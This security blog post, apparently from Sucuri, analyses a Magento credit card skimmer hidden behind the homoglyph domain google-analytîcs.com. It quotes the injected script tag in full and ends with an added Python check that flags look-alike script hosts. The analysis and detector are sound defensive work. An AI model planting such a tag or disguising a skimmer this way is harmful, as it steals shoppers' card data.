Fake Google Domains Used in Evasive Magento Skimmer

We were recently contacted by a Magento website owner who had been blacklisted and was experiencing McAfee SiteAdvisor “Dangerous Site” warnings.

Our investigation revealed that the site had been infected with a credit card skimmer loading JavaScript from the malicious internationalized domain google-analytîcs[.]com (or xn--google-analytcs-xpb[.]com in ASCII):

<script type="text/javascript" src="//google-analytîcs.com/www.[redacted].com/3f5cf4657d5d9.js"></script>

The attacker deliberately chose this domain name to deceive unsuspecting victims.
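A defender-side check for the pattern described above, as an added example that is not from the original post: it lists script hosts on a page that are internationalized domains and flags those that match a trusted host once diacritics are removed. The `TRUSTED` set, the sample HTML and its URL paths are constructed assumptions.

```python
import unicodedata
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: hosts this shop legitimately loads scripts from.
TRUSTED = {"google-analytics.com", "www.google-analytics.com"}

# Constructed sample page: a legitimate tag, the look-alike tag, and its punycode form.
SAMPLE_HTML = (
    '<script src="https://www.google-analytics.com/analytics.js"></script>\n'
    '<script src="//google-analyt\u00eecs.com/www.example.com/sample.js"></script>\n'
    '<script src="//xn--google-analytcs-xpb.com/www.example.com/sample.js"></script>\n'
)

def to_unicode(host):
    """Decode xn-- labels so both spellings of an IDN are handled alike."""
    try:
        return host.encode("ascii").decode("idna")
    except UnicodeError:
        return host  # already Unicode, or not valid punycode

def fold(host):
    """Drop diacritics (NFKD, then remove combining marks). This does not
    catch cross-script homoglyphs such as Cyrillic letters."""
    decomposed = unicodedata.normalize("NFKD", host)
    return "".join(c for c in decomposed if not unicodedata.combining(c))

class ScriptHosts(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hosts = []  # host of every <script src=...> seen
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src")
        host = urlsplit(src).hostname if tag == "script" and src else None
        if host:
            self.hosts.append(host)

def find_lookalikes(html):
    """Return (unicode_host, ascii_host, impersonated_host_or_None) per IDN script host."""
    parser = ScriptHosts()
    parser.feed(html)
    findings = []
    for host in map(to_unicode, parser.hosts):
        if host.isascii():
            continue  # plain ASCII hosts are out of scope for this check
        folded = fold(host)
        findings.append((host, host.encode("idna").decode("ascii"),
                         folded if folded in TRUSTED else None))
    return findings
```

Run `find_lookalikes` over stored templates or rendered pages; any finding whose third field is not `None` is a script host that imitates a trusted one.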


Source: Sucuri